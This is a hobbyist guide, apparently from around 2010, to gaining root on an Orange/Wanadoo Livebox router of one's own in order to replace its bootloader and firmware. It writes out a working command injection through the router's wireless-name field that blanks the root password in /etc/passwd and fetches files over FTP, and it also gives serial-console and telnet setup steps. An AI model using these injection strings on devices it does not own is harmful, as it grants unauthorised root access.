- Active Projects
There are two methods to breaking into your livebox
Both these methods exploit a bug in a specific version of the Livebox firmware.
If your firmware version is not 5.04-uk then you need to first downgrade to this release which still has the webserver exploit.
This cable terminates in an MMJ connector at one end and has a female DB9 RS232 connector at the other. All ready to go - no external power supply needed. Just plug in, set your terminal emulator program to 115200baud, 8 data bits, 1 stop bit and you are connected to the Busybox serial console. Supplied as three parts.
We don't provide a case for the PCB - this is left as an exercise for the reader (some, less fussy, readers simply wrap the entire PCB with insulating tape). Be sure not to allow the PCB to touch metal objects - 5VDC is present on the PCB.
Making an RS232 adaptor. Crimped up a RJ11 6P6C onto a piece of cat5 cable. Repurposed a PCB which has a Max232 onboard to do the hookup. N.B. The chip needed for this convertor is the MAX3232 - this works at 3.3V (costs rather more than a MAX232 - tried a MAX232, it doesn't work). Turns out that the serial port socket on the Livebox isn't a 'standard' RJ11 connector - it is a MMJ connector with the retaining clip offset from the centre of the socket - a standard RJ11 needs to have its clip cut off to allow the connector to enter. This gives 'reduced' insertion force, but there is a slight resistance - just enough to keep the connector in place.
On the PCB, there are solder pads for an RJ11 style socket - but no socket is populated on the board. It was hoped that this might expose a second serial port, but this is not the case.
When connected at 115200 Baud, No Parity , 8 Data Bits , 1 Stop Bit we are presented with a Login prompt. w00t! But we are asked for a root password. Doh!
So now getting in is going to be so much easier. Just change the Livebox Name (in browser UI menu Configuration→Advanced→Wireless) to each of the following in sequence: This works with UK firmware: 5.04.3. We only have 32 characters to play with in the wireless name so it must be entered as seen.
;echo root::0:0:::/bin/sh>/tmp/x ;cp /tmp/x /etc/passwd
Fire up your trusty serial console program: putty, teraterm, hyperterm or whatever.
I now have an etc.tar that lives on my FTP server so once I'm in I just
Please press Enter to activate this console. WANADOO-ECD0 login: root No directory, logging in with HOME=/ BusyBox v0.60.4 (2003) Built-in shell (ash) Enter 'help' for a list of built-in commands. # cd /etc # wget ftp://192.168.1.12/etc.tar # tar xvf etc.tar utelnetd init.d/telnetd rc2.d/S35telnet rc1.d/S35telnet # /etc/init.d/telnetd start telnetd: starting port: 23; login program: /bin/sh #
Of course once I'm in via the serial port I don't need to even bother with setting up a TELNETD server I could just cut straight to the chase and fetch the new RedBoot loader and flash it.
# cd /tmp # wget ftp://192.168.1.12/redboot_blueg5.6-patched # fcp -v redboot_blueg5.6-patched /dev/mtd0
There are a number of sites that give instructions on hacking in. This is a slightly modified version of what you'll normally find.
Connect an Ethernet patch cable to the yellow port on the Livebox & browse to
The next part of the process uses a 'backdoor' settings on the Livebox web server. These work in conjunction with an ftp server running on the PC that is connected to the Livebox. Since the Livebox runs Busybox, the 'wget' command is available to allow files to be pulled onto the Livebox via ftp. So setup an ftp server on your PC (we used FileZilla Server on Windoze) & enable 'anonymous' access. If this is the first time that you have configured an ftp server, you will need to read and understand the user-guide for your ftp server before proceeding. Also note that if you are running Vista, you will want to run the ftp server as the 'admin' user.
1. On the Livebox browser UI, in 'Configuration→Advanced→Network', change the LAN IP address to be 10.0.0.1
4. Download etc.tar into the FTP area on your PC and rename this file as u. We do this because we only have a limited number of characters available to us in the field we are using for the backdoor hack.
For info, here is what the tarfile contains:
$ tar tvf etc.tar -rwxrwxrwx root/root 18304 1970-01-01 01:00 utelnetd -rwxr-xr-x root/root 145 1970-01-01 01:06 init.d/telnetd lrwxrwxrwx root/root 0 1970-01-01 01:02 rc2.d/S35telnet -> ../init.d/telnetd lrwxrwxrwx root/root 0 1970-01-01 01:02 rc1.d/S35telnet -> ../init.d/telnetd
5. In Configuration→Advanced→Wireless, change Livebox Name to
;cd /etc;wget ftp://10.0.0.2/u
and select Submit and then Apply the configuration.
Check your FTP logs (on the PC).
On FileZilla, this looked like
000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> Connected, sending welcome message... (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220-FileZilla Server version 0.9.34 beta (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220-written by Tim Kosse (Tim.Kosse@gmx.de) (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220 Please visit http://sourceforge.net/projects/filezilla/ (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> USER anonymous (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 331 Password required for anonymous (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> PASS ****** (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 230 Logged on (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> SYST (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 215 UNIX emulated by FileZilla (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> PWD (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 257 "/" is current directory. (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> TYPE I (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 200 Type set to I (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> PORT 10,0,0,1,12,1 (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 200 Port command successful (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> RETR u (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 150 Opening data channel for file transfer. (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 226 Transfer OK (000001) 21/05/2010 11:11:42 - anonymous (10.0.0.1)> disconnected.
6. Now, in 'Configuration→Advanced→Wireless', change the Livebox Name to
;cd /etc; tar xf u
and select Submit and then Apply the configuration. The Livebox will now reboot.
This will install the telnetd and startup scripts. However those scripts only run on system startup. So you need to change your Livebox name one more time (to something meaningful) to cause another reboot.
This will now start the Telnet server and you should be able to connect and login to the Livebox by typing 'telnet 10.0.0.1' at a command prompt on the PC.
You should see something like this ..
BusyBox v0.60.4 (2003) Built-in shell (ash) Enter 'help' for a list of built-in commands. # ls Image etc_ro_fs linuxrc sbin webs bin flasher mnt tmp dev home proc tmp_ro_fs dev_update.sh home_ro_fs root usr etc lib root_ro_fs var #
If you find that you cannot access the Livebox via telnet, try unplugging/re-plugging power to the unit at this stage. Then re-try the telnet connection.
At this point, if you are working towards loading the HAH firmware, just skip to here to find out how to replace the RedBoot loader.
Alternatively, if you want to play about with the Busybox unix environment, carry out step 7.
7. Stopping 'phone home' behaviour. To prevent the Livebox finding it's way out to autoupdate, do the following. Look in /etc - you should see files 'autoconf.conf' and 'firm.conf'. Note that autoconf.conf is a symbolic link to a read only part of the filesystem. We need to make this an editable file.
# cp autoconf.conf autoconf.conf1 # # ls -la aut* lrwxrwxrwx 1 0 0 24 Jan 1 00:00 autoconf.conf -> /etc_ro _fs/autoconf.conf -rw-r--r-- 1 0 0 2718 Jan 1 00:41 autoconf.conf1 # # rm autoconf.conf # # mv autoconf.conf1 autoconf.conf #
Then use vi to edit 'autoconf.conf'. Change the following two lines
Do the same fix to 'firm.conf' - it is a file, not a symlink, so you don't need to recreate it.
This should stop all autoupdates.
Having connected a terminal to the Livebox serial port, we can see the output that is generated whilst the unit boots up.
@AABCBCCCC9655432SDRAM16bitX10120123456+78ESA: 00:07:3a:f9:0f:02 WEP KEY : E34E08C16FEAF50B985959B74B Ethernet eth0: MAC address 00:07:3a:f9:0f:02 IP: 10.7.58.112, Default server: 0.0.0.0 Hardware version 0x0A BLUE5G.6 WITHOUT OPTION Factory Settings Recovery Switch OFF RedBoot(tm) bootstrap and debug environment [ROM] Non-certified release, version release-wanadoo-fr - built 17:05:34, Aug 2 2005 Platform: Blue_5g (MIPS32 4Kc) Copyright (C) 2000, 2001, 2002, Red Hat, Inc. RAM: 0x80000000-0x81000000, [0x80434720-0x80fe2000] available FLASH: 0xbe400000 - 0xbec00000, 128 blocks of 0x00010000 bytes each. == Executing boot script in 0.200 seconds - enter ^C twice to abort RedBoot> fis load -b 0x80010000 -m cramfs -f Image user_fs Looking for Image in cramfs user_fs partition cramfs_load : b 0x80010000, c 0xBE430000, s 0x00720000, f Image .............loaded 0x1900FC bytes RedBoot> exec -c "boot_loader=RedBoot root=1F01 mem=16M" 0x80010000 Now booting linux kernel: Base address 0x8000fc00 Entry 0x80010000 Cmdline : boot_loader=RedBoot root=1F01 mem=16M arcs_cmdline: boot_loader=RedBoot root=1F01 mem=16M Boot loader : REDBOOT prom init CPU revision is: 00029107 Primary instruction cache 16kb, linesize 16 bytes (2 ways) Primary data cache 8kb, linesize 16 bytes (2 ways) Linux version 2.4.17 (bfo@bfo) (gcc version 3.2.2) #1 Tue Sep 20 16:56:45 CEST 2 005 Determined physical RAM map: memory: 00fa0000 @ 00000000 (usable) User-defined physical RAM map: memory: 00fa0000 @ 00000000 (usable) On node 0 totalpages: 4000 zone(0): 4000 pages. zone(1): 0 pages. zone(2): 0 pages. Kernel command line: boot_loader=RedBoot root=1F01 mem=16M bcm_console_setup Calibrating delay loop... 254.77 BogoMIPS Memory: 13812k/16000k available (1429k kernel code, 2188k reserved, 96k data, 60 k init, 0k highmem) Dentry-cache hash table entries: 2048 (order: 2, 16384 bytes) Inode-cache hash table entries: 1024 (order: 1, 8192 bytes) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) Buffer-cache hash table entries: 1024 (order: 0, 4096 bytes) Page-cache hash table entries: 4096 (order: 2, 16384 bytes) Checking for 'wait' instruction... unavailable. POSIX conformance testing by UNIFIX mpi: No Card is in the PCMCIA slot PCI: Fixing up bus 0 Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket Starting kswapd JFFS2 version 2.1. (C) 2001 Red Hat, Inc., designed by Axis Communications AB. pty: 256 Unix98 ptys configured brcmboard: brcm_board_init entry New led 8, mask : 0x00000001 New led 0, mask : 0x00000002 New led 9, mask : 0x00000004 New led 6, mask : 0x00000008 New led 1, mask : 0x00000010 Module bcm63xx_cons.c v1.0 date: Sep 20 2005 time: 16:56:56 - FPERIPH:50000000 block: 64 slots per queue, batch=16 PPP generic driver version 2.4.1 DBW flash: probing 16-bit flash bus Physically mapped flash: Probing for AMD compatible flash... mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002210, dev_id3 0x00002200 Found AMD AM29BDS643D table[i] : mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002202, dev_id3 0x0 0002200, long_dev_id 1 Found AMD AM29LV640MB table[i] : mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002210, dev_id3 0x0 0002200, long_dev_id 1 Found AMD AM29LV640MB Physically mapped flash: Found 1 x 8MiB AMD AM29LV640MB at 0x0 mtd_info : type 3, size 0x00800000, erasesize 0x00010000, name Physically mapped flash, ind ex 0, numeraseregions 3 mtd_info->priv : amd_flash_private : device_type 2, interleave 1, numchips 1, ch ipshift 23<5> mymtd is : 80f52120 Support for extended flash memory size : 0x00800000 ; ONLY 64MBIT SUPPORT RedBoot partition for 64MBit non aligned Flash RedBoot partition for 64MBit non aligned Flash RedBoot partition for 64MBit non aligned Flash RedBoot partition for 64MBit non aligned Flash RedBoot partition for 64MBit non aligned Flash Using RedBoot partition definition Creating 5 MTD partitions on "Physically mapped flash": 0x00000000-0x00030000 : "RedBoot" 0x00030000-0x00750000 : "user_fs" 0x00750000-0x007f0000 : "jffs_system" 0x007f0000-0x007ff000 : "FIS directory" 0x007ff000-0x00800000 : "RedBoot config" usb.c: registered new driver usbdevfs usb.c: registered new driver hub NET4: Linux TCP/IP 1.0 for NET4.0 IP Protocols: ICMP, UDP, TCP, IGMP IP: routing cache hash table of 512 buckets, 4Kbytes TCP: Hash tables configured (established 512 bind 1024) Linux IP multicast router 0.06 plus PIM-SM NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. Ebtables v2.0 registered<6>NET4: Ethernet Bridge 008 for NET4.0 VFS: Mounted root (cramfs filesystem) readonly. Freeing unused kernel memory: 60k freed init started: BusyBox v0.60.4 (2003) multi-call binary Algorithmics/MIPS FPU Emulator v1.5 SYSINIT INVENTEL version : v5.04.3-uk <SNIP> Sysinit done Please press Enter to activate this console. WANADOO-0F02 login: root BusyBox v0.60.4 (2003) Built-in shell (ash) Enter 'help' for a list of built-in commands. #
Now that you are in, to get your Livebox on the local area network, assuming your network Gateway is 192.168.11.1
Adding a default route
# route add default gw 192.168.11.1 dev br0
Specifying a nameserver. Edit /etc/resolv.conf and add the line